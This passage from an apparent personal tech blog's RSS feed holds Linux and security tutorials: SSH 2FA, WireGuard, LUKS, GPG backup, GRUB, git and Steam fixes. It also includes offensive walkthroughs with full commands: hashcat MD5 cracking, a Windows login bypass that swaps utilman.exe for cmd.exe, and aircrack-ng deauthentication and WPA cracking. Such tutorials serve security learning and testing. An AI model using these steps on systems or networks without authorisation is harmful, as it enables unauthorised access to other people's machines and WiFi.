auth required pam_google_authenticator.so
```

Where you place this line in the file matters:

- **Above** the line containing `@include common-auth`: This will ask for your password first, followed by the 2FA code.
- **Below** `@include common-auth`: This will ask for the 2FA code first, followed by the password.

Choose the sequence you prefer, save the file, and exit.

## Step 7: Restart SSH Again

To ensure all changes take effect, restart the SSH service one more time:

```bash
sudo systemctl restart ssh
```

## Step 8: Test 2FA

It’s time to test the 2FA setup. Try SSHing into your server:

```bash
ssh your-username@your-server-ip -v
```

You should first be prompted for your password, and then for the 2FA verification code generated by your app. Example:

```bash
$ ssh user@your-server
Password:
Verification code:
```

If both the password and 2FA code are correct, you will be logged in.

And that&apos;s it! You&apos;ve successfully set up 2FA on your GNU/Linux server.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to Build Your Own WireGuard VPN Server and Connect from Anywhere!</title><link>https://ummit.dev//posts/infosec/wireguard-vps/</link><guid isPermaLink="true">https://ummit.dev//posts/infosec/wireguard-vps/</guid><description>Learn how to set up your very own WireGuard VPN server and securely connect from anywhere!</description><pubDate>Sun, 24 Nov 2024 00:00:00 GMT</pubDate><content:encoded>## Introduction

WireGuard is a modern VPN protocol that’s fast, lightweight, and secure. Designed to outperform traditional tunneling protocols like IPsec and OpenVPN, it uses UDP to send traffic, making it ideal for high-performance connections.

In this tutorial, we’ll walk through how to set up your very own WireGuard VPN server and client. Once you’re done, you’ll have a private, secure, and blazing-fast VPN to use wherever you go. Let’s dive in!

### Prerequisites

A GNU/Linux server where you’ll set up the WireGuard VPN.

A client device (e.g., your phone or laptop) with the WireGuard app installed to connect to your server.

### Step 1: Install Wireguard

Let’s get started by installing WireGuard on your server. Before installation, make sure your server is updated and rebooted—this ensures everything runs smoothly since WireGuard includes a kernel module.

```bash
sudo apt update -y &amp;&amp; sudo apt upgrade -y &amp;&amp; sudo apt dist-upgrade -y
sudo apt install wireguard
sudo reboot
```

### Step 2: Login to root user

To avoid typing sudo repeatedly, switch to the root user. This is handy because all WireGuard configuration files are located in `/etc/wireguard`, and root access is required to edit them.

```bash
sudo su
```

### Step 3: Generate the Wireguard Nessessary Keys

Time to generate the keys for the server and client. WireGuard uses these keys for secure communication. Here’s what we need:

- Sever Private Key, Public Key
- Client Private Key, Public Key
- Pre-Shared Key

While you can paste keys directly into configuration files, saving them in files is more organized and makes them easier to reuse.

Now, to generate the server private and public keys, run the following commands:

```bash
cd /etc/wireguard

wg genkey | tee server_privatekey | wg pubkey &gt; server_publickey
```

Now, generate the client private and public keys.

```bash
wg genkey | tee client_privatekey | wg pubkey &gt; client_publickey
```

Finally, generate the pre-shared key.

```bash
wg genkey &gt; presharedkey
```

So the total files should have 5 files in the `/etc/wireguard` directory.

```bash
root@wg-o:/etc/wireguard# ls -l
total 20
-rw-r--r-- 1 root root  45 Nov 24 17:20 client_privatekey
-rw-r--r-- 1 root root  45 Nov 24 17:20 client_publickey
-rw-r--r-- 1 root root  45 Nov 24 17:17 server_privatekey
-rw-r--r-- 1 root root  45 Nov 24 17:17 server_publickey
-rw-r--r-- 1 root root  45 Nov 24 17:17 presharedkey
```

### Step 4: Configure the Wireguard Server

Create a configuration file called `wg0.conf` in `/etc/wireguard`. This file defines the WireGuard server settings.

```bash
vim /etc/wireguard/wg0.conf
```

Add the following configuration, replacing placeholders with your keys and values:

```bash
root@wg-o:/etc/wireguard# cat wg0.conf
[Interface]

# Address is the IP address that you want to assign.
Address = 10.66.66.1/24

# ListenPort is the port that you want to listen to.
ListenPort = &lt;PORT NUMBER&gt;

# PrivateKey is the server private key.
PrivateKey = &lt;SERVER PRIVATE KEY&gt;

# Set the port number of wireguard to 51820
# the interface name is wg0
# if not sure, use the command &apos;ip -c a&apos; to check the interface name
PostUp = iptables -I INPUT -p udp --dport 51820 -j ACCEPT
PostUp = iptables -I FORWARD -i eth0 -o wg0 -j ACCEPT
PostUp = iptables -I FORWARD -i wg0 -j ACCEPT
PostUp = iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
PostDown = iptables -D INPUT -p udp --dport 51820 -j ACCEPT
PostDown = iptables -D FORWARD -i eth0 -o wg0 -j ACCEPT
PostDown = iptables -D FORWARD -i wg0 -j ACCEPT
PostDown = iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE

### Client 1
[Peer]

# PublicKey is the client public key.
PublicKey = &lt;CLIENT PUBLIC KEY&gt;

# PresharedKey is the pre-shared key.
PresharedKey = &lt;PRESHARED KEY&gt;

# Set this IP you want to assign to the client
AllowedIPs = 10.66.66.2/32
```

### Step 5: Configure the Wireguard client

On the client device, create a configuration file. You can save it anywhere, such as `/root/client1.conf`.

Let say create the file on `/root/client1.conf`

```bash
[Interface]

# PrivateKey is the client private key.
PrivateKey = &lt;CLIENT PRIVATE KEY&gt;

# Address is the IP address that you want to assign.
Address = 10.66.66.2/32

# DNS is the DNS server that you want to assign.
# Optional, if you want to use the DNS server.
DNS = 1.1.1.1,1.0.0.1

[Peer]

# PublicKey is the server public key.
PublicKey = &lt;SERVER PUBLIC KEY&gt;

# PresharedKey is the pre-shared key.
PresharedKey = &lt;PRESHARED KEY&gt;

# Endpoint is the server IP address and port number.
Endpoint = &lt;SERVER IP&gt;:&lt;PORT NUMBER&gt;

# AllowedIPs is the IP address that you want to route.
AllowedIPs = 0.0.0.0/0
```

### Step 6: IP Forwarding

Enable IP forwarding on the server so traffic can flow between the server and client.

```bash
echo &quot;net.ipv4.ip_forward=1&quot; | tee -a /etc/sysctl.conf
sysctl -p
```

### Step 7: Start the Wireguard Server

Start the Wireguard server.

&gt;Note: You should got nothing output if the server is started successfully :)

```bash
systemctl enable wg-quick@wg0.service
systemctl start wg-quick@wg0.service
```

### Step 8: Generate the QR Code

Typing client configuration on your phone can be annoying, so let’s generate a QR code instead! First, install `qrencode`:

```bash
apt install qrencode
```

Now, generate the QR code for the client, the read-from is the client configuration file. So that why the path is not matter, you can create the file on everywhere you want.

```bash
qrencode --read-from=/root/client1.conf --type=UTF8
```

And you should get the QR code.

### Step 9: Connect to the Wireguard Server

Install the Wireguard client on the client device, like Android and Scan the QR code to connect to the Wireguard server.

And you should see the packet is sending and receiving on the server :) that mean you are successfully connected to the Wireguard server. and you now can enjoy the VPN service which is provided by your own Wireguard server 🤞🤞🤞

Get the client apk here: [Wireguard Android](https://github.com/WireGuard/wireguard-android)

### Feeling

Honestly, I research so many article about Wireguard, but those article really bad. I think this version is the best one. Most of the article is missing the keypoint of the targeting the private and public key how to generate and not clearly explain. And missing the PostUp and PostDown configuration.

So I decided to write this article to help those who are looking for the Wireguard VPN Server tutorial. I hope this article can help you to build your own Wireguard VPN Server :)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to Add More Keys and Verify Keys on LUKS</title><link>https://ummit.dev//posts/linux/tools/luks/luks-add-key-or-verify/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/luks/luks-add-key-or-verify/</guid><description>This article will guide you through the process of adding a new key and verifying it on LUKS-encrypted.</description><pubDate>Sun, 24 Nov 2024 00:00:00 GMT</pubDate><content:encoded>## Introduction

If you&apos;re using LUKS (Linux Unified Key Setup) for disk encryption, you might already have one or more passphrases set up for accessing your encrypted volumes. LUKS allows you to manage up to **eight key slots** (numbered 0 to 7), which means you can add additional passphrases for convenience or security purposes. This article will guide you through the process of adding a new key and verifying it.

### Prerequisites

Before proceeding, ensure that you already have at least one LUKS key set up on your device. This is essential because you&apos;ll need an existing passphrase to authenticate when adding a new one.

### Adding a New Key

To add a new passphrase to your LUKS-encrypted volume, use the `cryptsetup luksAddKey` command. Here’s how to do it:

1. **Open a terminal.**
2. **Execute the following command:**

   ```bash
   sudo cryptsetup luksAddKey /dev/nvme0n1p2
   ```

   Replace `/dev/nvme0n1p2` with the actual device identifier of your encrypted volume.

3. **Enter an existing passphrase** when prompted. This is necessary for authentication.
4. **Type the new passphrase** you want to add and confirm it.

This command adds the new passphrase to the next available key slot on the specified LUKS volume.

### Verifying the Key Added

To ensure that the new key has been successfully added, you can use the `cryptsetup luksDump` command:

```bash
sudo cryptsetup luksDump /dev/nvme0n1p2
```

This command will display detailed information about your LUKS volume, including the status of each key slot. You should see that one of the key slots is now filled with your newly added passphrase.

### Testing the Passphrase Without Rebooting

After adding a new passphrase, it&apos;s a good idea to test it immediately without rebooting your system. You can do this using the following command:

```bash
cryptsetup -v open --test-passphrase --type luks /dev/nvme0n1p2
```

Make sure to replace `/dev/nvme0n1p2` with the correct device identifier for your encrypted volume. Enter the new passphrase when prompted. If successful, this indicates that your new key is functioning correctly.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Brute-Force Attack on MD5 Hash Using Hashcat</title><link>https://ummit.dev//posts/infosec/hashcat/</link><guid isPermaLink="true">https://ummit.dev//posts/infosec/hashcat/</guid><description>Learn password cracking techniques using Hashcat on Linux with wordlist-based brute-force attacks on MD5 hashes.</description><pubDate>Mon, 28 Oct 2024 00:00:00 GMT</pubDate><content:encoded>## Introduction

MD5 is a cryptographic hash function that produces a 128-bit hash value, and its one-way function. That means you can&apos;t reverse the hash value to the original value. But you can break it using brute-force attack. In this article, I’ll guide you through the process of breaking an MD5 hash using Hashcat on Arch Linux or any other GNU/Linux distribution.

&gt;NOTICE: I&apos;ll not cover any guide on OSX or windows. Use GNU/Linux instead.

## Prerequisites

Before we start, you’ll need a wordlist for the brute-force attack. You can easily download a wordlist from the Arch User Repository (AUR) with the following command:

```bash
paru -S wordlists
```

The downloaded wordlists will be located at `/usr/share/wordlists` and will be about 2.1 GB in size.

## Installing Hashcat

Install Hashcat from the official Arch Linux repository using the `pacman` command:

```bash
sudo pacman -S hashcat rocm-hip-sdk rocm-opencl-sdk
```

## Using Hashcat

To begin the brute-force attack on the MD5 hash, use the following command:

```bash
hashcat -m 0 -a 0 -d 2 &lt;value_of_md5&gt; &lt;wordlist_file&gt;
```

This process may take some time, depending on the complexity of the hash and the size of your wordlist.

Once the process is complete, you can view the cracked value of the MD5 hash using:

```bash
hashcat -m 0 -a 0 &lt;value_of_md5&gt; --show
```

## Advantages of Hashcat

Hashcat is particularly useful for batch processing multiple hash values. You can leverage the `find` command to automate the process for all hashes in a specified directory. For example:

```bash
find /usr/share/wordlists/ -type f -exec hashcat -m 0 -a 0 -d 2 hash {} \;
```

This command will execute Hashcat for each file in the specified directory, making it an efficient way to handle multiple hashes.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to install Packet Tracer on Arch Linux</title><link>https://ummit.dev//posts/linux/distribution/archlinux/arch-install-packet-tracer/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/archlinux/arch-install-packet-tracer/</guid><description>Installing Packet Tracer on Arch Linux with AUR, a step-by-step guide.</description><pubDate>Mon, 21 Oct 2024 00:00:00 GMT</pubDate><content:encoded># Introduction

Just today, I was trying to install Packet Tracer on my Arch Linux machine. But from the official website, there is no official release for Arch Linux. Only the `.deb` vesrion.

I was looking for a way to install it without any hassle. I found a way to install it using AUR. So, I thought of sharing it with you guys. In this article, I will show you how to install Packet Tracer on Arch Linux with AUR.

Cisco Packet Tracer is a network simulation tool that is used for teaching and learning purposes. Also known as CCNA Course Lab, BUt there&apos;s no official release for Arch Linux. We need to download that `.deb` file from the official website, let me show you how to install it on Arch Linux.

&gt;I wont be covering the installation of AUR helper, You should familiar with the AUR helper like `yay` or `paru` :)

## Prerequisites

You need to enroll in the Cisco Networking Academy to download the Packet Tracer. and download that file from the official website.

&gt; https://www.netacad.com/resources/lab-downloads?courseLang=en-US

Choice the Linux version of `.deb` file and download it.

## Step 1: Git clone the AUR repository

First, we need to clone the AUR repository. Open your terminal and run the following command:

```bash
git clone https://aur.archlinux.org/packettracer.git
```

## Step 2: Change the directory

Now, change the directory to the cloned repository:

```bash
cd packettracer
```

## Step 3: Rename the downloaded file

Now, rename the downloaded file to `CiscoPacketTracer822_amd64_signed.deb`. and move it to the cloned repository:.

```bash
mv original_file_name.dev CiscoPacketTracer822_amd64_signed.deb # Rename the file
mv CiscoPacketTracer822_amd64_signed.deb packettracer/ # Move the file to the cloned repository
```

its the step of ensure that the file name is same with the PKGBUILD file.

## Step 4: Install the package

Now, install the package using the following command:

```bash
makepkg -si
```

From the packet tracer, I noticed that its required java runtime environment btw :)

## Finsihed

That&apos;s it! You have successfully installed Packet Tracer on Arch Linux using AUR. You can now start using it by searching for it in the application menu.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to Backup Your GPG Key</title><link>https://ummit.dev//posts/linux/tools/gpg/gpg-backup/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/gpg/gpg-backup/</guid><description>Export, secure, and restore your GPG keys for safe backup and transfer across different systems.</description><pubDate>Sat, 28 Sep 2024 00:00:00 GMT</pubDate><content:encoded>## Why?

Guess what! I bought a new laptop this week, so I have to work for my laptop development. I also need to git commit my repository. That&apos;s why I&apos;m sharing this article with you all! 🤗

## Introduction

GPG (GNU Privacy Guard) is a powerful tool for encrypting and signing data. Keeping your GPG keys backed up is crucial for maintaining access to encrypted files and messages. In this guide, we&apos;ll walk you through the process of exporting, securely transferring, and importing your GPG keys.

## Step 1: Export Your GPG Key

To create a backup of your GPG key, you&apos;ll first need to export it. Open your terminal and execute the following command, replacing `your-email@example.com` with the email associated with your GPG key:

```bash
gpg --export-secret-keys your-email@example.com &gt; private-key.gpg
```

This command generates a binary file named `private-key.gpg` containing your private key. For additional security, you can also export your public key with the following command:

```bash
gpg --export your-email@example.com &gt; public-key.gpg
```

## Step 2: Secure Your Backup

It’s vital to protect your private key file. Consider the following options:

- **Encryption**: Use an encryption tool to encrypt the `private-key.gpg` file.
- **Password Manager**: Store the file in a password manager that supports file attachments.
- **USB Drive**: Transfer the file to a USB drive and store it in a secure location.

## Step 3: Transfer the Backup

Now that you have your GPG keys backed up securely, transfer the `private-key.gpg` file (and optionally `public-key.gpg`) to your laptop. You can do this via:

- A secure USB drive
- A secure cloud service

## Step 4: Import the Key on Your Laptop

Once you have the backup file on your laptop, you can import your private key using the following command:

```bash
gpg --import private-key.gpg
```

To import the public key, use:

```bash
gpg --import public-key.gpg
```

## Step 5: Verify the Import

To ensure your keys have been imported correctly, list your keys by running:

```bash
gpg --list-keys
```

This command will display all the keys currently stored in your keyring.

## Conclusion

Backing up your GPG key is an essential practice for anyone using encryption to secure their data. By following the steps outlined in this guide, you can ensure that your keys are safely stored and easily recoverable. Always remember to protect your private key, as access to it allows others to decrypt your messages and impersonate you.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Intel Fucked Up and You Need to Update Your BIOS Now !!!</title><link>https://ummit.dev//posts/hardware/intel/intel-0x129/</link><guid isPermaLink="true">https://ummit.dev//posts/hardware/intel/intel-0x129/</guid><description>Critical BIOS update required for Intel 13th and 14th Gen CPUs to fix voltage issues and prevent hardware damage.</description><pubDate>Sat, 07 Sep 2024 00:00:00 GMT</pubDate><content:encoded>## What Happened?

Recently, Intel have a big issue with their 13th and 14th Gen CPUs. The problem stems from a voltage issue that causes excessive power, leading to instability and potential damage to the CPU. If you have an Intel Core 13th or 14th Gen CPU, you need to update your BIOS to address this issue. Otherwise, your entire hardware we be destroyed by time of quick.

### Steps to Download and Prepare Your BIOS File:

I will using my BIOS as an example [Gigabyte B760M GAMING X AX DDR4](https://www.gigabyte.com/Motherboard/B760M-GAMING-X-AX-DDR4/support#support-childModelsMenu) to show you how to update your BIOS.

1. **Download the BIOS File which is f18d:**
   - Go to the support page and download the latest BIOS file.

2. **Extract the ZIP File:**
   - The downloaded file will be named something like `mb_bios_b760m-g-x-ax-ddr4_8arpt040_f18d.zip`. Extract this ZIP file to reveal the BIOS update files.

   ![Example of ZIP File Contents](./F18d.png)

3. **Transfer Files to USB Drive:**
   - Copy the extracted files onto a USB drive. Ensure that the USB drive is formatted to FAT32 for compatibility.

### BIOS Update Information

The BIOS update should include the following key improvements:

- **Update Microcode to 0x129:** Addresses sporadic Vcore elevation behavior, as announced by Intel.
- **Introduce &quot;Intel Default Settings&quot;:** Enabled by default, this setting may need to be disabled to use GIGABYTE PerfDrive profiles effectively.

To update your BIOS, depending on your motherboard. For me it&apos;s Q-Flash to manually install the BIOS file you downloaded.

My previous BIOS version was F3, which was quite outdated. During the update process, the system will reboot several times. Note that it won&apos;t boot into the operating system until the update is complete. Once the update is finished, your system will boot normally.

## Checking the BIOS Version

After updating your BIOS, it’s crucial to verify that the CPU microcode version is `0x129` and the BIOS version is `F18d`. Here’s how you can check these details:

### 1. Check CPU Microcode Version

Run the following command in your terminal:

```shell
grep &quot;microcode&quot; /proc/cpuinfo # Check CPU microcode version
```

![Microcode Version Example](./microcode.png)

Make sure the output shows `microcode: 0x129` or something similar indicating the updated microcode version.

### 2. Check BIOS Version

To verify the BIOS version, use this command:

```shell
sudo dmidecode --type bios # Check BIOS version
```

![BIOS Version Example](./bios_version.png)

Ensure that the output shows `BIOS Version: F18d` or a version that reflects the latest update.

## References

- [B760M GAMING X AX DDR4](https://www.phoronix.com/review/intel-raptor-lake-0x129)
- [July 2024 Update on Instability Reports on Intel Core 13th and 14th Gen Desktop Processors](https://community.intel.com/t5/Processors/July-2024-Update-on-Instability-Reports-on-Intel-Core-13th-and/m-p/1617113#M74792)
- [Megathread for Intel Core 13th &amp; 14th Gen CPU instability issues](https://www.reddit.com/r/intel/comments/1egthzw/megathread_for_intel_core_13th_14th_gen_cpu/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How Hackers Break into Systems: Resetting Passwords Without the Old One</title><link>https://ummit.dev//posts/infosec/how-hacker-break-into-systems-without-old-one/</link><guid isPermaLink="true">https://ummit.dev//posts/infosec/how-hacker-break-into-systems-without-old-one/</guid><description>Educational guide to Windows password reset techniques using bootable media and system file manipulation for recovery.</description><pubDate>Mon, 26 Aug 2024 00:00:00 GMT</pubDate><content:encoded>## Introduction

This article is for educational purposes only. Please use this knowledge responsibly. Unauthorized access to systems is illegal and unethical. The methods here are used for legitimate recovery and testing, not for illegal activities.

This article is a method on using the same operating system to break into the system file. Not using other system to mounting the file you want.

## Why?

Sometimes people forget their system password. While there are proper ways to recover or reset a password, this guide will show you a basic method that was common in the past.

## Is it Easy?

Yes, it can be surprisingly easy with the right tools. Here&apos;s a simple overview:

1. **Use a bootable USB drive with Windows on it.**
2. **Replace a critical system file (`utilman.exe`) with `cmd.exe`.**
3. **Restart the system and use the modified file to open a command prompt.**
4. **Use the command prompt to create a new admin user or reset the password.**

## Step 1: Create a Bootable Windows USB

You need a USB drive with a bootable Windows ISO. Search online for guides if you’re not sure how to do this.

## Step 2: Boot from the USB

Insert the USB drive and restart your computer. Use F12 or F11 to choose the USB drive as the boot device.

## Step 3: Open Command Prompt

When you see the Windows Setup screen, press `Shift + F10` to open a command prompt.

## Step 4: Find the Right Drive

The command prompt starts in `X:\Sources` or a similar directory. You need to find your main system drive, usually `C:\`. Use the command:

```cmd
wmic logicaldisk get name
```

Switch to each drive and use `dir` to find the `Windows` folder and `cd` again into the `System32` folders.

```cmd
C:\
dir

...
# more precise
cd Windows
cd System32

# One line
cd Windows\System32
```

Repeat with `D:\` and others until you find the correct drive.

## Step 5: Rename `utilman.exe`

In the `System32` directory, rename `utilman.exe` to something else:

```cmd
ren utilman.exe utilman2.exe
```

## Step 6: Replace `utilman.exe` with `cmd.exe`

Copy `cmd.exe` and rename it to `utilman.exe`:

```cmd
copy cmd.exe utilman.exe
```

## How Does This Work?

You’ve replaced the utility manager (which appears on the login screen) with a command prompt.

## Step 7: Restart the System

Exit the Windows Setup and restart your computer. At the login screen, click the Utility Manager icon (near the power button). You’ll see a command prompt instead of the usual utility manager.

## Final Step: Reset the Password

In the command prompt, reset the password with:

```cmd
net user &lt;username&gt; &lt;new_password&gt;
```

Replace `&lt;username&gt;` with the actual username and `&lt;new_password&gt;` with your new password.

## Conclusion

After resetting the password, don’t forget to restore the original `utilman.exe` file. Use these commands to put things back:

```cmd
del utilman.exe
ren utilman2.exe utilman.exe
```

## Another ways

There are other, more complex methods using like `Mimikatz` or `ophcrack`, but they require more advanced knowledge and skills.

This method should be straightforward if you have experience with ethical hacking or CTF challenges.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to Set the Default Auto Load Seconds in GRUB</title><link>https://ummit.dev//posts/linux/tools/boot-loader/grub/grub-timeout-autoboot/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/boot-loader/grub/grub-timeout-autoboot/</guid><description>Adjust GRUB bootloader timeout settings to control how long the boot menu displays before auto-loading.</description><pubDate>Tue, 06 Aug 2024 00:00:00 GMT</pubDate><content:encoded># Introduction

To set the timeout for auto-boot, follow these steps:

## Step 1: Open the GRUB Configuration File

Open a terminal and run the following command to edit the file with root privileges:

```bash
sudo vim /etc/default/grub
```

## Step 2: Set the Timeout

Adjust the `GRUB_TIMEOUT` to the number of seconds you want GRUB to wait before automatically booting the default entry. For example, to set a 10-second timeout:

```bash
GRUB_TIMEOUT=10
```

## Step 4: Save and Exit

Save the changes by `:wq`

## Step 5: Update GRUB Configuration

After edited the GRUB configuration file, regenerate the GRUB configuration:

```bash
sudo grub-mkconfig -o /boot/grub/grub.cfg
```

## Step 6: Reboot

Restart your computer to see the changes take effect.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Setting the Default Kernel Select in GRUB</title><link>https://ummit.dev//posts/linux/tools/boot-loader/grub/grub-default-kernel-select/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/boot-loader/grub/grub-default-kernel-select/</guid><description>Configure GRUB bootloader to automatically select your preferred kernel version at system startup.</description><pubDate>Wed, 31 Jul 2024 00:00:00 GMT</pubDate><content:encoded>## Overview

If you’re using Multi kernel, or you might thinking the default selected options of that kernel not you want, as my case is the zen of kernel, but i want the default kernel is lts, this is alwasys need to using arrow-key to select the kernel you want. So in this article is gonna to walk you guys want to configure GRUB to boot into a specific kernel by default, follow these steps. This guide will help you set up your system to start with your preferred kernel version automatically.

In general, GRUB already has this feature by setting a variable of `GRUB_DEFAULT`.

### 1. Verify GRUB Entries

Verify the exact menu entries, you can list them using:

```bash
sudo grep menuentry /boot/grub/grub.cfg
```

This command will show all available menu entries, helping you confirm the correct entry name for `GRUB_DEFAULT`.

### 2. Edit the GRUB Configuration File

Open the GRUB configuration file with a text editor:

```bash
sudo vim /etc/default/grub
```

### 3. Set the Default Kernel

In `/etc/default/grub`, you have two options to set the default kernel:

- **By Entry Number**: Set the `GRUB_DEFAULT` variable to the position of the kernel entry in the GRUB menu. For example, to select the second entry:

  ```bash
  GRUB_DEFAULT=1
  ```

- **By Menu Entry Name**: Use the exact menu entry string as it appears in the GRUB menu. For example, with linux-lts:

  ```bash
  GRUB_DEFAULT=&quot;Advanced options for Arch Linux&gt;Arch Linux, with Linux linux-lts&quot;
  ```

  Make sure to use the exact string, including spaces and casing.

### 4. Update GRUB Configuration

After edited the GRUB configuration file, regenerate the GRUB configuration:

```bash
sudo grub-mkconfig -o /boot/grub/grub.cfg
```

### 5. Reboot

Restart your system to see the result.

### 6. Done

Now, with your grub menu, you should have automatically selected the lts kernel :D

Honestly, grub make everything easy to do :)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Cracking Wifi Password with Aircrack-NG</title><link>https://ummit.dev//posts/infosec/aircrack-ng/</link><guid isPermaLink="true">https://ummit.dev//posts/infosec/aircrack-ng/</guid><description>Educational guide to WiFi security testing using Aircrack-ng suite for monitoring, capturing, and analyzing wireless networks.</description><pubDate>Sat, 06 Jul 2024 00:00:00 GMT</pubDate><content:encoded>## Aircrack-ng?

to make a long story short. Aircrack-ng is a network software suite consisting of WiFi security tools that can be used to assess the security of wireless networks. It focuses on different areas of WiFi security, including monitoring, attacking, testing, and cracking.

### Disclaimer

This guide is for educational purposes only. Unauthorized access to wireless networks is illegal and unethical. Always obtain permission from the network owner before attempting to access or test their network security.

Only cracking your own network or network owner allowed you to do this.

## Step 1: Hardware Requirements

To getting started with Aircrack-ng, you&apos;ll need a compatible wireless network adapter that supports monitor mode and packet injection.

And also, Use a computer with a GNU/Linux operating system, such as Kali Linux, which comes pre-installed with Aircrack-ng. or you can install by yourself. like this:

```bash
sudo pacman -S aircrack-ng
```

&gt;Note: Below action will use sudo previlege all the time. So its better to use root user.

## Step 2: Checking Card Status

First, check if your wireless card supports monitor mode and recognizes the wireless interface:

```shell
iwconfig
```
![iwconfig](./iwconfig.gif)

## Step 3: Starting Monitor Mode

Enable monitor mode on your wireless interface `wlan0` its will disable your network connection.

```shell
airmon-ng start wlan0
```
![airmon-ng start wlan0](./airmon-ng start wlan0.png)

## Step 4: Finding Target WiFi Network

Identify the WiFi network, we will need the following information for the target network and crack it.

- ESSID (network name)
- BSSID (MAC address of the access point)
- Channel number

```shell
airodump-ng wlan0mon
```
![airodump-ng wlan0mon](./airodump-ng wlan0mon.gif)

## Step 5: Creating Capture File

Capture data from the target network:

```shell
airodump-ng -d [BSSID] -c[channel] -w [capture filename] wlan0mon
```
![Creating Cap file](./capfile.gif)
![Creating Cap file-2](./capfile-2.gif)
![file](./file.gif)

## Step 6: Performing Deauthentication Attack

This will fucking disconnect that wifi network and trying to capture inside the user handshark by they reconnecting to the network. The handshake aor PMKID is necessary to crack the WiFi password. You also can use the handshark and use other tools to crack the password like hashcat.

```shell
aireplay-ng --deauth 0 -a [BSSID] wlan0mon
```
![Device deauth](./handshake.gif)

## Step 7: Cracking the Password

Once you&apos;ve captured the handshake or PMKID, use Aircrack-ng to crack the WiFi password:

```shell
aircrack-ng [capture filename] -w [password list file]
```

![Cracking password](./cracking.png)

## Finaly Step: Closing Monitor Mode

After you&apos;ve finished testing the network security, stop the monitor mode on your wireless interface, and now your network connection will be back.

```shell
airmon-ng stop wlan0mon
```
![Stop Monitor Mode](./stop.png)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to Edit Git Commit Messages</title><link>https://ummit.dev//posts/linux/tools/git/git-edit-git-commit-messages/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/git/git-edit-git-commit-messages/</guid><description>Modify Git commit messages using interactive rebase for cleaner repository history and better documentation.</description><pubDate>Thu, 30 May 2024 00:00:00 GMT</pubDate><content:encoded>## Introduction

In the world of version control, mistakes happen – including in commit messages. Fortunately, Git provides a straightforward way to correct those messages, whether it&apos;s the first commit or any commit in your repository. Here&apos;s a step-by-step guide to editing Git commit messages:

### Step 1: Navigate to Your Repository Directory

Use the `cd` command to navigate to the directory where your Git repository resides. Ensure you&apos;re in the correct location to make the changes you need.

### Step 2: Initiate an Interactive Rebase

Start an interactive rebase by entering the following command:

```bash
git rebase -i --root
```

Using `--root` in the command instructs Git to start an interactive rebase from the very first commit in your repository, allowing you to review and edit all commits. If you want to edit specific commits, you can replace `--root` with `HEAD~n`, where `n` is the number of commits you want to edit. For example, to edit the last three commits, you can use `HEAD~3`.

### Step 3: Mark the Commits for Editing

Git will open a text editor displaying a list of commits. For each commit you want to edit, change the word `pick` to `reword` or simply `r` at the beginning of the corresponding line. This indicates that you want to edit the commit message.

### Step 4: Save and Exit

Save your changes and exit the text editor.

Vim: `:wq`
nano: `Ctrl + S and Ctrl +X`

### Step 5: Edit the Commit Messages

Git will pause at each commit marked for editing. For each paused commit, Git will open the text editor, allowing you to modify the commit message. Make your desired changes, then save and exit the text editor.

### Step 6: Complete the Rebase

After editing all desired commit messages, Git will continue with the rebase process, applying your changes.

### Step 7: Force Push Your Changes

You&apos;ll need to force push the changes to update the history. Use the following command:

```bash
git push origin master --force
```

### Well done!

With these steps, you can confidently edit Git commit messages whenever needed, ensuring your repository&apos;s history remains accurate and well-documented.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Fixing Slow Downloading on Steam for Linux: A Quick Guide</title><link>https://ummit.dev//posts/games/steam/fix-show-downloading-on-liunx/</link><guid isPermaLink="true">https://ummit.dev//posts/games/steam/fix-show-downloading-on-liunx/</guid><description>Fix slow Steam download speeds on Linux by disabling HTTP/2 and optimizing connection settings.</description><pubDate>Mon, 01 Jan 2024 00:00:00 GMT</pubDate><content:encoded>## Introduction

Are you tired of sluggish download speeds on Steam while using Linux? Don&apos;t worry; there&apos;s a solution! In this quick guide, we&apos;ll explore steps to fix slow downloading issues on your Steam Linux.

## Editing Steam&apos;s Configuration File

1. Open the Steam configuration file using your preferred text editor. Let&apos;s use `nvim` for this example:

```shell
nvim ~/.steam/steam/steam_dev.cfg
```

2. Add the following lines to the configuration file:

```shell
@nClientDownloadEnableHTTP2PlatformLinux 0
@fDownloadRateImprovementToAddAnotherConnection 1.0
```

3. Save the changes and exit the text editor.

4. Restart Steam and try download the game again. You should see the Speed has a big change! As shown in the image below:

![Speed](./featured.png)

## How It Works

### 1. HTTP/2 on Linux

The first line, `@nClientDownloadEnableHTTP2PlatformLinux 0`, disables the use of HTTP/2 for downloads on the Linux platform. While HTTP/2 is generally more efficient, some users have reported issues with Steam&apos;s implementation on Linux. Disabling it might help fix slow downloading problems.

### 2. Download Rate Improvement

The second line, `@fDownloadRateImprovementToAddAnotherConnection 1.0`, adjusts the download rate improvement by allowing Steam to add another connection. This tweak can be particularly beneficial for users with high-speed internet connections, as it enables Steam to utilize additional connections, potentially resolving slow downloading issues.

The line `@fDownloadRateImprovementToAddAnotherConnection` `1.0` increases the number of connections Steam makes to servers (up to 10, usually connects to around 3, with a hard cap in the code). This adjustment can theoretically improve download speeds.

## References

- [Steam Download Speed is so slow on Linux](https://gist.github.com/FikriRNurhidayat/ce18426ad94fff2140538c0adf0e06ec)
